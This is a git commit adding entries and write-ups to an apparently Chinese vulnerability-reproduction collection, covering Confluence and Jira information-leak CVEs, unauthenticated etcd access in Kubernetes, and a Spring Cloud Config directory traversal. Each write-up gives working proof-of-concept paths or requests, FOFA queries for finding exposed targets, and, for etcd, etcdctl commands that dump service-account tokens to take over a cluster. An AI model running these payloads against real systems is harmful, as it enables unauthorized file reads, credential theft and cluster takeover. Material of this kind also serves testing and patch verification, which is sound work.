更新漏洞

2025-11-05 10:50:23 +00:00 · 2023-07-17 17:09:21 +08:00 · 2023-07-17 17:09:21 +08:00 · b9388f7b51
commit b9388f7b51
parent 190c8e74dc
5 changed files with 171 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -4,6 +4,8 @@

 ## 0x01 项目导航

+  * 微信小程序反编译
+  * 蜜罐技术研究与识别
 - CMS漏洞

  * 74cms v4.2.1 v4.2.129 后台getshell漏洞
@ -204,6 +206,7 @@
  * Atlassian Bitbucket 登录绕过漏洞
  * Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084
  * Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396
+  * Atlassian Confluence 敏感信息泄露 CVE-2021-26085
  * Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086
  * Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442
  * Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449
@ -211,6 +214,7 @@
  * Atlassian Jira Mobile Plugin SSRF漏洞 CVE-2022-26135
  * Atlassian Jira Server 及 Data Center 信息泄露漏洞 CVE-2020-14179
  * Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181
+  * Atlassian Jira 敏感信息泄露 CVE-2021-26086
  * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138
  * AVCON6 系统管理平台 download.action 任意文件下载漏洞
  * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
@ -480,6 +484,7 @@
 - 云安全漏洞

  * K8s API Server未授权命令执行
+  * K8s etcd未授权访问
 - 其他漏洞

  * Microsoft Word 远程代码执行漏洞 CVE-2023-21716
@ -500,6 +505,7 @@
  * PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841
  * Rails Accept 任意文件读取漏洞 CVE-2019-5418
  * Rails sprockets 任意文件读取漏洞 CVE-2018-3760
+  * Spring Cloud Config 目录遍历漏洞 CVE-2019-3799
  * Spring Cloud Function SPEL 远程命令执行漏洞
  * XStream SSRF 反序列化漏洞 CVE-2020-26258
  * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259
--- a/Web应用漏洞/Atlassian
+++ b/Web应用漏洞/Atlassian
@ -0,0 +1,35 @@
+# Atlassian Confluence 敏感信息泄露 CVE-2021-26085
+
+## 漏洞描述
+
+Confluence 是一个专业的企业知识管理与协同软件，也可以用于构建企业 wiki。使用简单，但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论，信息推送。该漏洞不是任意文件读取，只能读取一些 confluence 的配置文件，影响有限。
+
+参考链接：
+
+- https://jira.atlassian.com/browse/CONFSERVER-67893
+
+## 漏洞影响
+
+```
+version < 7.4.10
+7.5.0 ≤ version < 7.12.3
+```
+
+## FOFA
+
+```
+app="ATLASSIAN-Confluence"
+```
+
+## 漏洞复现
+
+poc：
+
+```
+/s/123cfx/_/;/WEB-INF/web.xml
+/s/123cfx/_/;/WEB-INF/decorators.xml
+/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
+/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
+/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
+```
+
--- a/Web应用漏洞/Atlassian
+++ b/Web应用漏洞/Atlassian
@ -0,0 +1,38 @@
+# Atlassian Jira 敏感信息泄露 CVE-2021-26086
+
+## 漏洞描述
+
+JIRA是Atlassian公司出品的项目与事务跟踪工具，被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
+
+参考链接：
+
+- https://jira.atlassian.com/browse/JRASERVER-72695
+
+## 漏洞影响
+
+```
+version < 8.5.14
+8.6.0 ≤ version < 8.13.6
+8.14.0 ≤ version < 8.16.1
+```
+
+## FOFA
+
+```
+app="ATLASSIAN-JIRA"
+```
+
+## 漏洞复现
+
+poc：
+
+```
+/s/cfx/_/;/WEB-INF/web.xml
+/s/cfx/_/;/WEB-INF/decorators.xml
+/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
+/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
+/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
+/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
+/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
+```
+
--- a/etcd未授权访问.md
+++ b/etcd未授权访问.md
@ -0,0 +1,61 @@
+# K8s etcd未授权访问
+
+## 漏洞描述
+
+etcd 是云原生架构中重要的基础组件。etcd 在微服务和 Kubernates 集群中不仅可以作为服务注册于发现，还可以作为 key-value 存储的中间件，为 k8s 集群提供底层数据存储，保存了整个集群的状态。
+
+在 K8s 集群初始化后，etcd 默认就以 pod 的形式存在，可以执行如下命令进行查看，etcd 组件监听的端口为 2379，并且对外开放。
+
+```
+kubectl get pods -A | grep etcd
+```
+
+在 etcd 的配置文件 /etc/kubernetes/manifests/etcd.yaml 中，--client-cert-auth 默认为 true，这意味着访问 etcd 服务需要携带 cert 进行认证。
+
+如果目标在启动 etcd 的时候没有开启证书认证选项，且 2379 端口直接对外开放的话，则存在 etcd 未授权访问漏洞。
+
+etcdctl 下载地址：https://github.com/etcd-io/etcd
+
+## 漏洞复现
+
+### 查看是否存在未授权访问
+
+访问以下链接，查看是否存在未授权访问。
+
+```
+https://your-ip:2379/version
+-------------
+返回如下则存在未授权访问：
+{etcdserver: "3.4.3", etcdcluster: "3.4.0"} 
+```
+
+```
+https://your-ip:2379/v2/keys
+-------------
+返回如下则存在未授权访问：
+{"action":"get","node":{"dir":true,"nodes":...}}
+```
+
+### 查找 Token 接管集群
+
+由于 Service Account 关联了一套凭证，存储在 Secret 中。因此我们可以过滤 Secret，查找具有高权限的 Secret，然后获得其 token 接管 K8s 集群。
+
+```
+#查找所有的 secret
+./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://your-ip:2379/ get / --prefix --keys-only|sort|uniq| grep secret
+```
+
+以 `/registry/secrets/kube-system/dashboard-admin-token-c7spp` 为例，查看指定 secret 保存的证书和 token：
+
+```
+#查找指定 secret 保存的证书和 token
+./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://your-ip:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp
+```
+
+最终的 token 为 `token?` 和 `\#kubernetes.io/service-account-token` 之间的部分。可以使用 curl 验证 token 的有效性：
+
+```
+curl --header "Authorization: Token" -X GET https://your-ip:6443/api -k
+```
+
+然后，就可以使用 token 登录 dashboard 或者远程命令管理 K8s。
--- a/开发框架漏洞/Spring
+++ b/开发框架漏洞/Spring
@ -0,0 +1,31 @@
+# Spring Cloud Config 目录遍历漏洞 CVE-2019-3799
+
+## 漏洞描述
+
+由于 spring-cloud-config-server 模块未对传入路径进行安全限制，攻击者可以利用多个 `..%252f` 进行目录遍历，查看服务器其他路径的敏感文件，造成敏感信息泄露。
+
+## 漏洞影响
+
+```
+Spring Cloud Config 2.1.0 to 2.1.1
+Spring Cloud Config 2.0.0 to 2.0.3
+Spring Cloud Config 1.4.0 to 1.4.5
+```
+
+## 漏洞复现
+
+```
+GET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1
+Host: your-ip:8888
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+## 漏洞修复
+
+Spring 官方最新版本已经对 Spring Cloud Config 目录遍历漏洞进行了修复，下载地址：https://github.com/spring-cloud/spring-cloud-config/releases